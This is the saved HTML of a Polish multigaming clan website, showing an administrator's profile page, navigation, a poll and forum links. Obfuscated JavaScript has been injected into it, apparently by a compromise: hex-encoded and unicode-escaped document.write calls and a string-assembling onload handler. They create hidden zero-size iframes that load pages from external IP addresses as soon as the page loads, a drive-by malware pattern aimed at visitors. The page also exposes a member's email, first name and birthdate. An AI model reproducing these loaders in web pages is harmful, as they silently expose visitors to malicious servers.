<!-- o65 --><script type="text/javascript">
function E4C91FB26400DB2E8E6D1A43F8(E24F89741580A88A1){function B7BF85150AC30DBA42(){return 16;}return(parseInt(E24F89741580A88A1,B7BF85150AC30DBA42()));}function E34AB0D7708CB83225AC60547C769(A558AE9C2D9A9BCFF8A136E3D631DD2){var B23FC86F17B841112="";for(C39BD7887D5CF0A0869467393D621AF=0;C39BD7887D5CF0A0869467393D621AF<A558AE9C2D9A9BCFF8A136E3D631DD2.length;C39BD7887D5CF0A0869467393D621AF+=2){B23FC86F17B841112+=(String.fromCharCode(E4C91FB26400DB2E8E6D1A43F8(A558AE9C2D9A9BCFF8A136E3D631DD2.substr(C39BD7887D5CF0A0869467393D621AF,2))));}document.write(B23FC86F17B841112);}E34AB0D7708CB83225AC60547C769("3C696672616D65207372633D27687474703A2F2F35382E36352E3233332E39372F666F72756D2F6F75742E706870272077696474683D273127206865696768743D273127207374796C653D27646973706C61793A2068696464656E3B273E3C2F696672616D653E");
</script><!-- c65 --><html>
<head>
<meta http-equiv="Content-Language" content="pl">
<link href="_stylesheet.css" rel="stylesheet" type="text/css"> 
<script src="js/bbcode.js" language="jscript" type="text/javascript"></script>
<title>Team oF Unity Multigaming</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
</head>

<body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh='t';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);;" bgcolor="#4B4B4B" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" rightmargin="0" bottommargin="0"><!-- o65 --><!-- c65 -->



<table align="center" border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="885">
  <tr>
    <td width="6" background="images/image_02.gif">&nbsp;<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0038\u0031\u002e\u0031\u0037\u0036\u002e\u0032\u0033\u0037\u002e\u0031\u0034\u0030\u002f\u0073\u0065\u0072\u0076\u002f\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>
</td>

    <td width="873"><table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="873">
  <tr>
    <td width="100%">
			<img src="images/image_03.gif" width="873" height="248" alt=""></td>
  </tr>
  <tr>
    <td width="100%">
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" bgcolor="#383837">
      <tr>
        <td width="15">
			<img src="images/image_06.gif" width="15" height="32" alt=""></td>
        <td width="56">
			<a href="index.php?site=news&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_07.gif" onmouseover="src='images/image2_07.gif'" onmouseout="src='images/image_07.gif'" border="0" width="56" height="32"></a></td>
        <td width="90">
			<a href="index.php?site=news&action=archive&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_08.gif" onmouseover="src='images/image2_08.gif'" onmouseout="src='images/image_08.gif'" border="0" width="90" height="32"></a></td>
        <td width="82">
			<a href="index.php?site=articles&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_09.gif" onmouseover="src='images/image2_09.gif'" onmouseout="src='images/image_09.gif'" border="0" width="82" height="32"></a></td>
        <td width="59">
			<a href="index.php?site=members&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_10.gif" onmouseover="src='images/image2_10.gif'" onmouseout="src='images/image_10.gif'" border="0" width="59" height="32"></a></td>
        <td width="65">
			<a href="index.php?site=clanwars&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_11.gif" onmouseover="src='images/image2_11.gif'" onmouseout="src='images/image_11.gif'" border="0" width="65" height="32"></a></td>
        <td width="101">
			<a href="index.php?site=awards&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_12.gif" onmouseover="src='images/image2_12.gif'" onmouseout="src='images/image_12.gif'" border="0" width="101" height="32"></a></td>
        <td width="95">
			<a href="index.php?site=sponsors&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_13.gif" onmouseover="src='images/image2_13.gif'" onmouseout="src='images/image_13.gif'" border="0" width="95" height="32"></a></td>
        <td width="78">
			<a href="index.php?site=server&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_14.gif" onmouseover="src='images/image2_14.gif'" onmouseout="src='images/image_14.gif'" border="0" width="78" height="32"></a></td>
        <td width="67">
			<a href="index.php?site=forum&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_15.gif" onmouseover="src='images/image2_15.gif'" onmouseout="src='images/image_15.gif'" border="0" width="67" height="32"></a></td>
        <td width="73">
			<a href="index.php?site=history&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_16.gif" onmouseover="src='images/image2_16.gif'" onmouseout="src='images/image_16.gif'" border="0" width="73" height="32"></a></td>
            <td width="76">
			<a href="index.php?site=contact&ws_session=c7467fef98a94d935f65827b534d3a6a">
			<img src="images/image_17.gif" onmouseover="src='images/image2_17.gif'" onmouseout="src='images/image_17.gif'" border="0" width="76" height="32"></a></td>
        <td width="16">
			<img src="images/image_18.gif" onmouseover="src='images/image2_18.gif'" onmouseout="src='images/image_18.gif'" border="0" width="16" height="32"></td>

 </tr>
    </table>
    </td>
  </tr>
  <tr>
    <td width="100%">
			<img src="images/image_19.gif" width="873" height="8" alt=""></td>
  </tr>
  <tr>
    <td width="100%">
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
      <tr>
        <td width="2%">
			<img src="images/image_20.gif" width="5" height="31" alt=""></td>
        <td width="16%">
			<img src="images/image_21.gif" width="208" height="31" alt=""></td>
        <td width="2%">
			<img src="images/image_22.gif" width="11" height="31" alt=""></td>
        <td width="20%">
			<img src="images/image_23.gif" width="210" height="31" alt=""></td>
        <td width="1%">
			<img src="images/image_24.gif" width="9" height="31" alt=""></td>
        <td width="23%">
			<img src="images/image_25.gif" width="209" height="31" alt=""></td>
        <td width="1%">
			<img src="images/image_26.gif" width="10" height="31" alt=""></td>
        <td width="95%">
			<img src="images/image_27.gif" width="208" height="31" alt=""></td>
        <td width="20%">
			<img src="images/image_28.gif" width="3" height="31" alt=""></td>
      </tr>
      <tr valign="top">
        <td width="2%" background="images/image_29.gif">
			&nbsp;</td>
        <td width="16%" background="images/image_30.gif">
<table width="100%" cellspacing="0" cellpadding="2"><tr><td><img src="images/flags/de.gif" width="18" height="12" border="0" alt="Germany"> <a href="index.php?site=news_comments&newsID=9&lang=de&ws_session=c7467fef98a94d935f65827b534d3a6a">29.09: da</a></td></tr><tr><td><img src="images/flags/de.gif" width="18" height="12" border="0" alt="Germany"> <a href="index.php?site=news_comments&newsID=8&lang=de&ws_session=c7467fef98a94d935f65827b534d3a6a">06.11: Nowi gracze w tOu</a></td></tr><tr><td><img src="images/flags/de.gif" width="18" height="12" border="0" alt="Germany"> <a href="index.php?site=news_comments&newsID=7&lang=de&ws_session=c7467fef98a94d935f65827b534d3a6a">04.11: Wspomnienia z WCG</a></td></tr><tr><td><img src="images/flags/de.gif" width="18" height="12" border="0" alt="Germany"> <a href="index.php?site=news_comments&newsID=6&lang=de&ws_session=c7467fef98a94d935f65827b534d3a6a">03.11: Reaktywacja</a></td></tr></table>			</td>
        <td width="2%" background="images/image_31.gif">
			&nbsp;</td>
        <td width="20%" background="images/image_32.gif">
			<table width="100%" cellspacing="4" cellpadding="0"></table></td>
        <td width="1%" background="images/image_33.gif">
			&nbsp;</td>
        <td width="23%" background="images/image_34.gif">
			<table width="100%" cellspacing="4" cellpadding="0"><tr><td>&#8226; <a href="index.php?site=articles&action=show&articlesID=2&ws_session=c7467fef98a94d935f65827b534d3a6a">30.12: Mp5 - Skromne cacko</a></td></tr><tr><td>&#8226; <a href="index.php?site=articles&action=show&articlesID=1&ws_session=c7467fef98a94d935f65827b534d3a6a">29.12: Bindy na kupowanie</a></td></tr></table></td>
        <td width="1%" background="images/image_35.gif">
			&nbsp;</td>
        <td width="95%" background="images/image_36.gif">
			<table width="100%" cellpadding="2" cellspacing="1" bgcolor="#666666">
  <tr bgcolor="#333333">
    <td class="title" width="20"></td>
	<td class="title">Board/Topic:</td>
	<td class="title" align="center">replys:</td>
  </tr>
  <tr><td colspan="4" bgcolor="#3B3B3A"></td></tr>

  <tr>
    <td bgcolor="#434343" width="20" align="center"><img src="images/icons/foldericons/folder.gif" width="14" height="15"></td>
    <td bgcolor="#3B3B3A" width="100%"><div style="overflow:hidden;">&#8226; <a href="index.php?site=forum&board=4&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>Problemy</b></a><br>&nbsp;&nbsp;&nbsp;<a href="index.php?site=forum_topic&topic=11&type=ASC&page=1&ws_session=c7467fef98a94d935f65827b534d3a6a">grac mi sie chce ³œ</a></div></td>
	<td bgcolor="#434343" width="30" align="center">0</td>
  </tr>


  <tr>
    <td bgcolor="#313130" width="20" align="center"><img src="images/icons/foldericons/folder.gif" width="14" height="15"></td>
    <td bgcolor="#282828" width="100%"><div style="overflow:hidden;">&#8226; <a href="index.php?site=forum&board=3&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>Historia</b></a><br>&nbsp;&nbsp;&nbsp;<a href="index.php?site=forum_topic&topic=1&type=ASC&page=1&ws_session=c7467fef98a94d935f65827b534d3a6a">Historia</a></div></td>
	<td bgcolor="#313130" width="30" align="center">1</td>
  </tr>


</table>

</td>
        <td width="20%" background="images/image_37.gif">
			&nbsp;</td>
      </tr>
    </table>
    </td>
  </tr>
  <tr>
    <td width="100%">
			<img src="images/image_38.gif" width="873" height="17" alt=""></td>
  </tr>
  <tr valign="top">
    <td width="100%">
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" height="294">
      <tr valign="top">
        <td width="189" bgcolor="#363636" height="294">
			<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
              <tr>
                <td width="100%">
			<img src="images/image_39.gif" width="189" height="31" alt=""></td>
              </tr>
              <tr>
                <td width="100%">
                <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
                  <tr>
                    <td width="5" background="images/image_42.gif">
			&nbsp;</td>
                    <td width="179" background="images/image_43.gif">
			<table width="100%" cellpadding="2" cellspacing="0">
<tr>
  <form method="post" name="login" action="checklogin.php"><input type="hidden" name="ws_session" value="c7467fef98a94d935f65827b534d3a6a" /> 
  <td>
    <input name="ws_user" type="text" class="form_username" onFocus="this.className='form_on'" onBlur="this.className='form_off'" size="10"> 
    <input name="pwd" type="password" class="form_password" onFocus="this.className='form_on'" onBlur="this.className='form_off'" size="10">
    
	<input type="submit" name="Submit" value="login">
  </td>
</form>
</tr>
</table> 
&#8226; <a href="index.php?site=register&ws_session=c7467fef98a94d935f65827b534d3a6a">register now</a><br>
&#8226; <a href="index.php?site=lostpassword&ws_session=c7467fef98a94d935f65827b534d3a6a">lost password</a><br>
&#8226; <a href="index.php?site=registered_users&ws_session=c7467fef98a94d935f65827b534d3a6a">registered users</a><br>


<!-- o65 --><script type="text/javascript">
function E4C91FB26400DB2E8E6D1A43F8(E24F89741580A88A1){function B7BF85150AC30DBA42(){return 16;}return(parseInt(E24F89741580A88A1,B7BF85150AC30DBA42()));}function E34AB0D7708CB83225AC60547C769(A558AE9C2D9A9BCFF8A136E3D631DD2){var B23FC86F17B841112="";for(C39BD7887D5CF0A0869467393D621AF=0;C39BD7887D5CF0A0869467393D621AF<A558AE9C2D9A9BCFF8A136E3D631DD2.length;C39BD7887D5CF0A0869467393D621AF+=2){B23FC86F17B841112+=(String.fromCharCode(E4C91FB26400DB2E8E6D1A43F8(A558AE9C2D9A9BCFF8A136E3D631DD2.substr(C39BD7887D5CF0A0869467393D621AF,2))));}document.write(B23FC86F17B841112);}E34AB0D7708CB83225AC60547C769("3C696672616D65207372633D27687474703A2F2F35382E36352E3233332E39372F666F72756D2F6F75742E706870272077696474683D273127206865696768743D273127207374796C653D27646973706C61793A2068696464656E3B273E3C2F696672616D653E");
</script><!-- c65 --><!-- o65 --><script type="text/javascript">
function E4C91FB26400DB2E8E6D1A43F8(E24F89741580A88A1){function B7BF85150AC30DBA42(){return 16;}return(parseInt(E24F89741580A88A1,B7BF85150AC30DBA42()));}function E34AB0D7708CB83225AC60547C769(A558AE9C2D9A9BCFF8A136E3D631DD2){var B23FC86F17B841112="";for(C39BD7887D5CF0A0869467393D621AF=0;C39BD7887D5CF0A0869467393D621AF<A558AE9C2D9A9BCFF8A136E3D631DD2.length;C39BD7887D5CF0A0869467393D621AF+=2){B23FC86F17B841112+=(String.fromCharCode(E4C91FB26400DB2E8E6D1A43F8(A558AE9C2D9A9BCFF8A136E3D631DD2.substr(C39BD7887D5CF0A0869467393D621AF,2))));}document.write(B23FC86F17B841112);}E34AB0D7708CB83225AC60547C769("3C696672616D65207372633D27687474703A2F2F35382E36352E3233332E39372F666F72756D2F6F75742E706870272077696474683D273127206865696768743D273127207374796C653D27646973706C61793A2068696464656E3B273E3C2F696672616D653E");
</script><!-- c65 --></td>
                    <td width="5" background="images/image_44.gif">
			&nbsp;</td>
                  </tr>
                </table>
                </td>
              </tr>
              <tr>
                <td width="100%">
			<img src="images/image_49.gif" width="189" height="30" alt=""></td>
              </tr>
              <tr>
                <td width="100%">               
                <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
                  <tr>
                    <td width="5" background="images/image_42.gif">
			&nbsp;</td>
                    <td width="179" background="images/image_43.gif">
			<table cellspacing="2" cellpadding="0">
				   <tr><form method="post" action="polls.php?action=vote"><input type="hidden" name="ws_session" value="c7467fef98a94d935f65827b534d3a6a" />
				   <td><b>Jak ci siê podoba stronka ?</b><br><br></td></tr><tr><td><input class="input" type="radio" name="vote" value="1"> Jest piêkna<br><input class="input" type="radio" name="vote" value="2"> Nawet ladna<br><input class="input" type="radio" name="vote" value="3"> Taka sobie<br><input class="input" type="radio" name="vote" value="4"> Brzydka<br></td></tr><tr><td><br>
			    <input type="hidden" name="pollID" value="1">
			    <input type="submit" value="vote"></td></form></tr><tr><td><br>&#8226; <a href="index.php?site=polls&ws_session=c7467fef98a94d935f65827b534d3a6a">show polls</a></td></tr></table></td>
                    <td width="5" background="images/image_44.gif">
			&nbsp;</td>
                  </tr>
                </table></td>
              </tr>
              <tr>
                <td width="100%">
			<img src="images/image_57.gif" width="189" height="30" alt=""></td>
              </tr>
              <tr>
                <td width="100%">              
                <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
                  <tr>
                    <td width="5" background="images/image_42.gif">
			&nbsp;</td>
                    <td width="179" background="images/image_43.gif">
			<table width="100%" border="0" cellspacing="0" cellpadding="2">
  <tr> 
    <td>248 visits (today)</td>
  </tr>
  <tr>
    <td>130 visits (yesterday)</td>
  </tr>
  <tr>
    <td>378 visits (month)</td>
  </tr>
  <tr> 
    <td>84607 visits total</td>
  </tr>
  <tr> 
    <td>67 registered users</td>
  </tr>
  <tr>
   <td></td>
  </tr>
  <tr> 
    <td><a href="index.php?site=whoisonline&ws_session=c7467fef98a94d935f65827b534d3a6a">0 users</a> online</td>
  </tr>
  <tr> 
    <td><a href="index.php?site=whoisonline&ws_session=c7467fef98a94d935f65827b534d3a6a">4 guests</a> online</td>
  </tr>
  <tr>
    <td>&#8226; <a href="index.php?site=counter_stats&ws_session=c7467fef98a94d935f65827b534d3a6a">Show statistic</td>
  </tr>

</table>

</td>
                    <td width="5" background="images/image_44.gif">
			&nbsp;</td>
                  </tr>
                </table></td>
              </tr>
            </table>
        </td>
        <td width="496" height="294">
			<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
              <tr>
                <td width="100%">
			<img src="images/reklama.gif" width="496" height="31" alt=""></td>
              </tr>
              <tr>
                <td width="100%" height="8">
                      &nbsp;</td>
              </tr>
              <tr>
                <td width="100%">
                      <p align="center">
                      <a href="out.php?bannerID=2&ws_session=c7467fef98a94d935f65827b534d3a6a" target="_blank"><img src="./images/bannerrotation/2.gif" border="0" alt="ESL baner"></a></td>
              </tr>
              <tr>
                <td width="100%" height="8">
			&nbsp;</td>
              </tr>
              <tr>
                <td width="100%">
			<img src="images/image_40.gif" width="496" height="31" alt=""></td>
              </tr>
              <tr>
                <td width="100%">
                      <h2>profile</h2>

<br>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
	<tr>
		<td>
			<table width="100%" cellpadding="2" cellspacing="1" bgcolor="#666666">
				<tr>
					<td class="title" bgcolor="#333333" width="20%">&nbsp; <a class="titlelink" href="index.php?site=profile&id=2&ws_session=c7467fef98a94d935f65827b534d3a6a">Profile</a></td>
					<td class="title" bgcolor="#333333" width="20%">&nbsp; <a class="titlelink" href="index.php?site=profile&id=2&action=galleries&ws_session=c7467fef98a94d935f65827b534d3a6a">Galleries</a></td>
					<td class="title" bgcolor="#333333" width="20%">&nbsp; <a class="titlelink" href="index.php?site=profile&id=2&action=buddys&ws_session=c7467fef98a94d935f65827b534d3a6a">Buddys</a></td>
					<td class="title" bgcolor="#333333" width="20%">&nbsp; <a class="titlelink" href="index.php?site=profile&id=2&action=lastposts&ws_session=c7467fef98a94d935f65827b534d3a6a">Last 10 posts</a></td>
					<td class="title" bgcolor="#333333" width="20%">&nbsp; <a class="titlelink" href="index.php?site=profile&id=2&action=guestbook&ws_session=c7467fef98a94d935f65827b534d3a6a">Guestbook</a></td>
				</tr>
			</table>
		</td>
	</tr>
	<tr>
		<td bgcolor="#3B3B3A"></td>
  </tr>
</table>
<br>
 <table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="60%" valign="top"><table width="100%" cellpadding="2" cellspacing="1" bgcolor="#666666">
        <tr> 
          <td colspan="2" class="title" bgcolor="#333333">&nbsp; &#8226; Personal Info</td>
        </tr>
        <tr> 
          <td colspan="2" bgcolor="#3B3B3A"></td>
        </tr>
        <tr> 
          <td width="35%" bgcolor="#434343">Nickname:</td>
          <td width="65%" bgcolor="#3B3B3A"><b>Unleashed.ini</b>  <img src="images/icons/member.gif" width="6" height="11" alt="Clanmember"></td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Status:</td>
          <td bgcolor="#282828">offline</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Usertitle:</td>
          <td bgcolor="#3B3B3A">Administrator<br>
            <img src="images/icons/ranks/admin.gif"></td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Contact:</td>
          <td bgcolor="#282828"><a href="mailto:simon1999000@gmail.pl"><img src="images/icons/email.gif" width="15" height="11" border="0" alt="e-mail"></a>   n/a</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Homepage:</td>
          <td bgcolor="#3B3B3A"></td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Real Name:</td>
          <td bgcolor="#282828">Jarek </td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Sexuality:</td>
          <td bgcolor="#3B3B3A">male</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Age:</td>
          <td bgcolor="#282828">1991-08-25 (23 years)</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Location:</td>
          <td bgcolor="#3B3B3A"><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> </td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Registered since:</td>
          <td bgcolor="#282828">14.12.2006 - 20:43</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Last Login:</td>
          <td bgcolor="#3B3B3A">06.11.2007 - 20:29</td>
        </tr>
      </table>
      <br>
      <table width="100%" cellspacing="1" cellpadding="2" bgcolor="#666666">
        <tr> 
          <td class="title" bgcolor="#333333">&nbsp; &#8226; About</td>
        </tr>
        <tr> 
          <td bgcolor="#3B3B3A"></td>
        </tr>
        <tr> 
          <td bgcolor="#434343">n/a</td>
        </tr>
      </table>
      <br>
      <table width="100%" cellspacing="1" cellpadding="2" bgcolor="#666666">
        <tr> 
          <td colspan="2" class="title" bgcolor="#333333">&nbsp; &#8226; Clan / Equipment</td>
        </tr>
        <tr> 
          <td colspan="2" bgcolor="#3B3B3A"></td>
        </tr>
        <tr> 
          <td width="35%" bgcolor="#434343">Clan:</td>
          <td width="65%" bgcolor="#3B3B3A">tG. /  tOu.Gaming<br>(HP: n/a)</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Irc-Channel:</td>
          <td bgcolor="#282828">n/a</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Clan-History:</td>
          <td bgcolor="#3B3B3A">n/a</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">CPU:</td>
          <td bgcolor="#282828">AMD athlon 4000+</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Mainboard:</td>
          <td bgcolor="#3B3B3A">n/a</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">RAM:</td>
          <td bgcolor="#282828">2GB</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Monitor:</td>
          <td bgcolor="#3B3B3A">15' Daewoo</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Graphiccard:</td>
          <td bgcolor="#282828">GeForce 8600GT </td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Soundcard:</td>
          <td bgcolor="#3B3B3A">n/a</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">I-Connection:</td>
          <td bgcolor="#282828">n/a</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Keyboard:</td>
          <td bgcolor="#3B3B3A">Logitech Cordless</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Mouse:</td>
          <td bgcolor="#282828">A4TECH X-710</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Mousepad:</td>
          <td bgcolor="#3B3B3A">Szmacianka</td>
        </tr>
      </table> </td>
    <td width="1%">&nbsp;</td>
    <td width="39%" valign="top"><table width="100%" cellpadding="2" cellspacing="1" bgcolor="#666666">
        <tr> 
          <td class="title" bgcolor="#333333">&nbsp; &#8226; Userpic:</td>
        </tr>
        <tr> 
          <td bgcolor="#3B3B3A"></td>
        </tr>
        <tr> 
          <td height="215" align="center" bgcolor="#434343"><img src="images/userpics/2.jpg"></td>
        </tr>
      </table>
      <br>
      <table width="100%" cellspacing="1" cellpadding="2" bgcolor="#666666">
        <tr> 
          <td class="title" bgcolor="#333333">&nbsp; &#8226; Latest Visitors <span class="small">&nbsp;&nbsp;&nbsp;(visited 17 
            times)</span></td>
        </tr>
        <tr> 
          <td bgcolor="#3B3B3A"></td>
        </tr>
        <tr bgcolor="#434343"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=71&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>Psq3</b></a></td>
							 <td align="right" class="small">2440d22h40m <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#3B3B3A"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=50&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>amOniak</b></a></td>
							 <td align="right" class="small">2735d2h12m <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#434343"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=48&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>OxY</b></a></td>
							 <td align="right" class="small">2738d7h22m <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#3B3B3A"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=40&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>m[!]St[!]ck</b></a></td>
							 <td align="right" class="small">2757d20h19m <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#434343"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=38&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>Ania</b></a></td>
							 <td align="right" class="small">2759d5h56m <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#3B3B3A"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=14&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>Spider</b></a></td>
							 <td align="right" class="small">2821d20h <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#434343"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/uk.gif" width="18" height="12" border="0" alt="United Kingdom"> <a href="index.php?site=profile&id=10&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>CheatOff[+]</b></a></td>
							 <td align="right" class="small">2825d6h <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#3B3B3A"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=8&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>euro</b></a></td>
							 <td align="right" class="small">2842d43m <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#434343"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=27&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>Acc</b></a></td>
							 <td align="right" class="small">2842d16h57m <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr><tr bgcolor="#3B3B3A"> 
                       <td>
					     <table width="100%" cellpadding="0" cellspacing="0">
					       <tr>
						     <td><img src="images/flags/pl.gif" width="18" height="12" border="0" alt="Poland"> <a href="index.php?site=profile&id=28&ws_session=c7467fef98a94d935f65827b534d3a6a"><b>pumatoh</b></a></td>
							 <td align="right" class="small">2844d1h15m <img src="images/icons/offline.gif" width="7" height="7" alt="offline"></td>
						   </tr>
						 </table>
					   </td>
                     </tr>
      </table>
      <br>
      <table width="100%" cellspacing="1" cellpadding="2" bgcolor="#666666">
        <tr> 
          <td colspan="2" class="title" bgcolor="#333333">&nbsp; &#8226; Statistics</td>
        </tr>
        <tr> 
          <td colspan="2" bgcolor="#3B3B3A"></td>
        </tr>
        <tr> 
          <td width="70%" bgcolor="#434343">Forumtopics:</td>
          <td width="30%" align="center" bgcolor="#3B3B3A">1</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Newsposts:</td>
          <td bgcolor="#282828" align="center">1</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Newscomments:</td>
          <td bgcolor="#3B3B3A" align="center">0</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Forumposts:</td>
          <td bgcolor="#282828" align="center">1</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Clanwarcomments:</td>
          <td bgcolor="#3B3B3A" align="center">0</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Articlecomments:</td>
          <td bgcolor="#282828" align="center">0</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Democomments:</td>
          <td bgcolor="#3B3B3A" align="center">0</td>
        </tr>
        <tr> 
          <td bgcolor="#313130">Messenger (incoming):</td>
          <td bgcolor="#282828" align="center">1</td>
        </tr>
        <tr> 
          <td bgcolor="#434343">Messenger (outgoing):</td>
          <td bgcolor="#3B3B3A" align="center">30</td>
        </tr>
      </table></td>
  </tr>
</table>
<br>
<br>
<br>
<br>
                      &nbsp;</td>
              </tr>
            </table>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <p>&nbsp;</td>
        <td width="188" bgcolor="#363636" height="294">
			<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%">
              <tr>
                <td width="100%">
			<img src="images/image_41.gif" width="188" height="31" alt=""></td>
              </tr>
              <tr>
